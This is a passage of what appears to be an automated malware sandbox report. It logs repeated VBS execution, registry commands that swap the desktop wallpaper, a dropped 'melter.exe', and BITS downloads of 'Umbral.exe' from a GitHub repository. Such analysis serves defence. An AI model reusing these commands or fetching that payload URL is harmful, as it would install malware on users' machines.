C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:4336
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:4840
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:6464
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:4960
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:4840
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:6604
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:4960
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:4840
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:4840
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7180
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7192
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7204
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:7224
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7236
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7276
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7288
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7304
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7316
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:7332
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7340
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7364
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7384
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7396
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7408
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:7424
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7444
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7468
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7480
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7492
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7504
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:7524
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7540
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7564
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7576
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7588
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7600
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:7616
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7644
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7660
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7672
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7684
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7696
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:7712
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7744
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7760
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7776
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7796
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7808
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:7824
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7844
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7868
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7880
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7892
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7904
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:7920
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:7928
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:7948
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:7972
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:7984
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:7996
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:8016
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:8032
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:8056
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:8072
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:8084
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:8096
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:8116
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:8136
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:8164
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:8176
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:8188
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"3⤵PID:1632
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"3⤵PID:4296
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"3⤵PID:2440
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"3⤵PID:1700
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"3⤵PID:232
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"3⤵PID:4888
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"3⤵PID:4928
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"3⤵PID:3012
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"3⤵PID:1760
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"3⤵PID:1476
-
-
C:\Users\Admin\AppData\Local\Temp\melter.exemelter.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1256
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x3d0 0x4781⤵PID:1932
Network
-
Remote address:8.8.8.8:53Request73.31.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request55.36.223.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestgithub.comIN AResponsegithub.comIN A20.26.156.215
-
Remote address:20.26.156.215:443RequestHEAD /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe HTTP/2.0
host: github.com
accept: */*
accept-encoding: identity
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 302
date: Fri, 09 Aug 2024 10:49:28 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/github-completion/completions proxy.enterprise.githubcopilot.com/v1/engines/github-completion/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-length: 0
x-github-request-id: FB6C:3227D6:5A0719:655EF0:66B5F492
-
Remote address:20.26.156.215:443RequestGET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe HTTP/2.0
host: github.com
accept: */*
accept-encoding: identity
range: bytes=0-1119
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 302
date: Fri, 09 Aug 2024 10:49:28 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/github-completion/completions proxy.enterprise.githubcopilot.com/v1/engines/github-completion/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-length: 0
x-github-request-id: FB6C:3227D6:5A0763:655F3F:66B5F492
-
Remote address:20.26.156.215:443RequestGET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe HTTP/2.0
host: github.com
accept: */*
accept-encoding: identity
range: bytes=1120-3325
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 302
date: Fri, 09 Aug 2024 10:49:28 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/github-completion/completions proxy.enterprise.githubcopilot.com/v1/engines/github-completion/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-length: 0
x-github-request-id: FB6C:3227D6:5A092F:65613E:66B5F492
-
Remote address:20.26.156.215:443RequestGET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe HTTP/2.0
host: github.com
accept: */*
accept-encoding: identity
range: bytes=3326-7624
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 302
date: Fri, 09 Aug 2024 10:49:28 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/github-completion/completions proxy.enterprise.githubcopilot.com/v1/engines/github-completion/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-length: 0
x-github-request-id: FB6C:3227D6:5A0B03:65632E:66B5F495
-
Remote address:20.26.156.215:443RequestGET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe HTTP/2.0
host: github.com
accept: */*
accept-encoding: identity
range: bytes=7625-18493
user-agent: Microsoft BITS/7.8
ResponseHTTP/2.0 302
date: Fri, 09 Aug 2024 10:49:28 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/github-completion/completions proxy.enterprise.githubcopilot.com/v1/engines/github-completion/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com 